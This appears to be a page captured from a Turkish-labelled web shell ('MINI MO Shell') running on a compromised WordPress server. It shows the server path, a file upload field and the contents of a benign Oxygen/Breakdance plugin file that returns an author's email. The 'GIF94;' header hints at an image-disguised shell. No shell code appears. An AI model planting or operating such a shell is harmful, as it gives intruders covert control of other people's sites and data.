GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/author/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/dynamic-data/fields/author/author-email.php

<?php

namespace Breakdance\DynamicData;

class AuthorEmail extends StringField
{
    /**
     * @inheritDoc
     */
    public function label()
    {
        return __('Author Email', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function category()
    {
        return __('Author', 'breakdance');
    }

    /**
     * @inheritDoc
     */
    public function slug()
    {
        return 'author_email';
    }

    /**
     * @inheritDoc
     */
    public function handler($attributes): StringData
    {
        global $post;
        if (!$post) {
            return StringData::emptyString();
        }
        $author_id = $post->post_author;

        return StringData::fromString(get_the_author_meta('user_email', $author_id));
    }
}

OHA YOOO - Tarih: 2026-08-04 00:05:16